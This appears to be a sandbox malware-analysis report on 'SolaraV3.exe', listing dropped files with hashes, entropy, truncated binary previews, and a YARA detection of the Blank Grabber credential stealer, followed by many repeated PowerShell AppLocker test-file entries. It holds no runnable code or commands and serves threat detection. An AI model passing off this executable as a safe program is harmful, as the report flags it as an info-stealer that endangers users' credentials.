                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........@.a.@.a.@.a..v..F.a..v....a..v..M.a..J..B.a.{.b.H.a.{.d.j.a.{.e.U.a.I..K.a.@.`...a..d...a....A.a..c.A.a.Rich@.a.................PE..d....~.^.........."..........2.................@.............................p.......4....`..................................................]..x.......Xy......pD...`...?...`..........T...................x...(.......................@............................text...C........................... ..`.rdata..:p.......r..................@..@.data............2...b..............@....pdata..pD.......F..................@..@.tls................................@....rsrc...Xy.......z..................@..@.reloc.......`.......V..............@..B................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\SolaraV3.exe
                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                            Category:modified
                                                                                                                                                                                                                            Size (bytes):456
                                                                                                                                                                                                                            Entropy (8bit):4.447296373872587
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:12:Bn9j9sxpCDPxfhKLiaE5cNH0u/OCIhjWO:B9jiWDpf025cNU7CIEO
                                                                                                                                                                                                                            MD5:4531984CAD7DACF24C086830068C4ABE
                                                                                                                                                                                                                            SHA1:FA7C8C46677AF01A83CF652EF30BA39B2AAE14C3
                                                                                                                                                                                                                            SHA-256:58209C8AB4191E834FFE2ECD003FD7A830D3650F0FD1355A74EB8A47C61D4211
                                                                                                                                                                                                                            SHA-512:00056F471945D838EF2CE56D51C32967879FE54FCBF93A237ED85A98E27C5C8D2A39BC815B41C15CAACE2071EDD0239D775A31D1794DC4DBA49E7ECFF1555122
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Yara Hits:
                                                                                                                                                                                                                            • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rarreg.key, Author: Joe Security
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:RAR registration data.Blank-c.Stealer License.UID=e7ae0ee11c8703113d95.64122122503d95ca34668bc2ffb72bcf8579be24bc20f3cd84baaf.afcf62e30badf158ad0c60feb872189f288e79eb40c28ca0ab6407.3a46f47624f80a44a0e4d71ef4224075bf9e28fce340a29099d287.15690be6b591c3bb355e99d6d1b8ffcd69602cb8aaa6dedf268c83.55c1fb90c384a926139625f6c0cbfc57a96996fdb04075bf9e28fc.e340a29067e9237e333577d2c7f3ed1d0f63287f74c9e50c60d76d.b5915ff59f78103d48e0826658d72ba8813da4a649711057613203.
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\SolaraV3.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):26392
                                                                                                                                                                                                                            Entropy (8bit):7.406438297877472
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:384:7iRf5SV1a/KjrtZa7gJXEOBILQGe6vHQIYiSy1pCQ6wYPxh8E9VF0NyvrO:7GxSVQiVpUOBILQGek5YiSyvrYPxWEl6
                                                                                                                                                                                                                            MD5:B6DE7C98E66BDE6ECFFBF0A1397A6B90
                                                                                                                                                                                                                            SHA1:63823EF106E8FD9EA69AF01D8FE474230596C882
                                                                                                                                                                                                                            SHA-256:84B2119ED6C33DFBDF29785292A529AABBF75139D163CFBCC99805623BB3863C
                                                                                                                                                                                                                            SHA-512:1FC26E8EDC447D87A4213CB5DF5D18F990BBA80E5635E83193F2AE5368DD88A81FDDFB4575EF4475E9BF2A6D75C5C66C8ED772496FFA761C0D8644FCF40517CA
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........!.F.O.F.O.F.O.O...D.O...N.D.O...J.M.O...K.N.O...L.B.O...N.D.O.F.N...O...N.C.O...B.G.O...O.G.O....G.O...M.G.O.RichF.O.................PE..d.....,d.........." .....0...............................................................`......................................... ...L....................`..............l..........................................8...........................................UPX0....................................UPX1.....0.......(..................@....rsrc................,..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\SolaraV3.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):637208
                                                                                                                                                                                                                            Entropy (8bit):7.9938769843425055
                                                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                                                            SSDEEP:12288:cgQcg1GTl88t0wK2F/vqa544fHQ8+f9qwSKjxC785HhqNFAKNiyxWS/:cgduil88t7Ksa0DfHQzUKjxC7EhqNFA+
                                                                                                                                                                                                                            MD5:0C4996047B6EFDA770B03F8F231E39B8
                                                                                                                                                                                                                            SHA1:DFFCABCD4E950CC8EE94C313F1A59E3021A0AD48
                                                                                                                                                                                                                            SHA-256:983F31BC687E0537D6028A9A65F4825CC560BBF3CB3EB0D3C0FCC2238219B5ED
                                                                                                                                                                                                                            SHA-512:112773B83B5B4B71007F2668B0344BF45DB03BBE1F97AE738615F3C4E2F8AFB54B3AE095EA1131BF858DDFB1E585389658AF5DB56561609A154AE6BB80DC79BA
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......._.v....@...@...@...@...@I..A...@I..A...@I..A...@I..A...@P..A...@...@...@..A...@..A...@..@...@..A...@Rich...@........PE..d.....,d.........." .....`...0.......Z....................................................`..........................................{..."...x.......p.......0..L....................................................f..8...........................................UPX0....................................UPX1.....`.......X..................@....rsrc....0...p.......\..............@......................................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\SolaraV3.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):296728
                                                                                                                                                                                                                            Entropy (8bit):7.985011478309557
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:6144:UcNGPr86AeT4HbUO2GkYmuUuQG1a7kj04fuNPYn/VoR4:UcNGz86iHbUORk+D1a7kLWNwna4
                                                                                                                                                                                                                            MD5:C697DC94BDF07A57D84C7C3AA96A2991
                                                                                                                                                                                                                            SHA1:641106ACD3F51E6DB1D51AA2E4D4E79CF71DC1AB
                                                                                                                                                                                                                            SHA-256:58605600FDAAFBC0052A4C1EB92F68005307554CF5AD04C226C320A1C14F789E
                                                                                                                                                                                                                            SHA-512:4F735678B7E38C8E8B693593696F9483CF21F00AEA2A6027E908515AA047EC873578C5068354973786E9CFD0D25B7AB1DD6CBB1B97654F202CBB17E233247A61
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........$z.eJ).eJ).eJ)...).eJ)..K(.eJ)..O(.eJ)..N(.eJ)..I(.eJ)|.K(.eJ)..K(.eJ).eK).eJ)|.G(.eJ)|.J(.eJ)|..).eJ)|.H(.eJ)Rich.eJ)........................PE..d.....,d.........." .....P...........V... ................................................`..........................................{..X....y.......p..........H............{.......................................b..8...........................................UPX0....................................UPX1.....P... ...F..................@....rsrc........p.......J..............@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
